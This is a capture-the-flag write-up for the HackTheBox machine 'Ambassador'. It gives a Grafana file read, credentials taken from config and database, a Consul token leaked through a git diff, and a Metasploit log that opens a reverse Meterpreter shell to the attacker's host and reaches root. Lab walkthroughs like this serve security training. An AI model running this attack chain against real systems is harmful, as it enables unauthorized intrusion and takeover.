Ambassador - HTB - Key Points
November 3, 2022•610 words
Target's IP: 10.10.11.183
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
3306/tcp open mysql
Grafana on 3000 subject to unauthorized arbitrary file read, as per https://www.exploit-db.com/exploits/50581
Reading passwd, consul and grafana and developer are users on the box
Googling for common configuration files, we can read /etc/grafana/grafana.ini
# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = sqlite3
;host = 127.0.0.1:3306
;name = grafana
;user = root
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
;password =
# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = messageInABottle685427
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
do...21! is the password for user grafana on mysql
MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW...g== |
+-----------+------------------------------------------+
1 row in set (0.166 sec)
developer@ambassador:~$ cat user.txt
41...49
Checking for processes running as root, there is
/usr/bin/consul agent -config-dir=/etc/consul.d/config.d -config-file=/etc/consul.d/consul.hcl
In order to operate with the consul agent, however, we need a key
Checking for weird folders that we can access, there is a git repository that contains the key we need to interact with the consul agent
developer@ambassador:/opt/my-app$ git diff 33a53ef9a207976d5ceceddc41a199558843bf3c c982db8eff6f10f8f3a7d802f79f2705e7a21b55
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index fc51ec0..35c08f6 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
# We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
+# Export MYSQL_PASSWORD before running
-consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
msf6 exploit(multi/misc/consul_service_exec) > run
[*] Started reverse TCP handler on 10.10.14.12:4444
[*] Creating service 'JMIna'
[*] Service 'JMIna' successfully created.
[*] Waiting for service 'JMIna' script to trigger
[*] Sending stage (1017704 bytes) to 10.10.11.183
[*] Meterpreter session 1 opened (10.10.14.12:4444 -> 10.10.11.183:48698) at 2022-10-26 17:21:57 +0200
[*] Removing service 'JMIna'
[*] Command Stager progress - 100.00% done (763/763 bytes)
meterpreter > shell
Process 30708 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
25...2e
Merry hacking ;)